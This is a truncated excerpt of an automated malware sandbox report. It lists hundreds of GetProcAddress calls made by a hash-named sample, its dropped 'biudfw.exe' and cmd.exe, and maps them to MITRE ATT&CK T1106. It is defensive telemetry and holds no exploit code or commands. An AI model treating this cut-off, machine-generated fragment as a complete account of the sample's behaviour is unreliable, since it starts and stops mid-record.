RegEnumKeyExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005876)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LCMapStringW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter OutputDebugStringW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter WriteConsoleW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FlushFileBuffers (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetStdHandle (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter OpenEventW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetStringTypeW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCPInfo (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetOEMCP (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter IsValidCodePage (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetFilePointerEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FreeEnvironmentStringsW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentStringsW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCommandLineW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter UnhandledExceptionFilter (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetLastError (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter TlsAlloc (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter TlsGetValue (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter TlsSetValue (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter TlsFree (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetConsoleMode (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ReadConsoleW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetConsoleCP (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LoadAcceleratorsW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LoadCursorW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegisterClassExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DialogBoxParamW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter wsprintfW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LoadIconW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EndDialog (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EndPaint (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter BeginPaint (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetThreadStackGuarantee (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetLogicalProcessorInformation (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetDefaultDllDirectories (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EnumSystemLocalesEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetDateFormatEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetTimeFormatEx (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter IsValidLocaleName (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006040)\n \"biudfw.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006040)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003956)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003956)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1000110070760b00@ADVAPI32.dll\"\n \"0e000f0092760b00@ADVAPI32.dll\"\n \"0b000c0084760b00@ADVAPI32.dll\"\n \"0d000e0060760b00@ADVAPI32.dll\"\n \"15001600c03e3d69@ADVAPI32.dll\"\n \"0e000f00703f3d69@ADVAPI32.dll\"\n \"0e000f00cc3f3d69@ADVAPI32.dll\"\n \"11001200b4473d69@ADVAPI32.dll\"\n \"1100120048483d69@ADVAPI32.dll\"\n \"120013008c483d69@ADVAPI32.dll\"\n \"12001300e4483d69@ADVAPI32.dll\"\n \"14001500386e3d69@ADVAPI32.dll\"\n \"14001500506e3d69@ADVAPI32.dll\"\n \"14001500686e3d69@ADVAPI32.dll\"\n \"17001800806e3d69@ADVAPI32.dll\"\n \"0d000e00986e3d69@ADVAPI32.dll\"\n \"11001200a86e3d69@ADVAPI32.dll\"\n \"11001200bc6e3d69@ADVAPI32.dll\"\n 